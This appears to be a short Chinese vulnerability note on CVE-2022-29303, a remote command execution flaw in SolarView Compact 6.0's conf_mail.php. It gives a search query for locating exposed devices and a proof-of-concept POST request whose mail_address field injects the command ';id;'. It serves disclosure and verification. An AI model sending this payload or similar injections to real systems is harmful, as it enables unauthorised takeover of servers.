跳转至

SolarView Compact conf_mail.php 远程命令执行漏洞 CVE-2022-29303

漏洞描述

SolarView Compact conf_mail.php 存在远程命令执行漏洞,攻击者通过构造特殊的请求,可以获取服务器权限

漏洞影响

SolarView Compact 6.0

网络测绘

body="SolarView Compact" && title=="Top"

漏洞复现

主页面

img

验证POC

POST /conf_mail.php

mail_address=%3Bid%3B&button=%83%81%81%5B%83%8B%91%97%90M 

img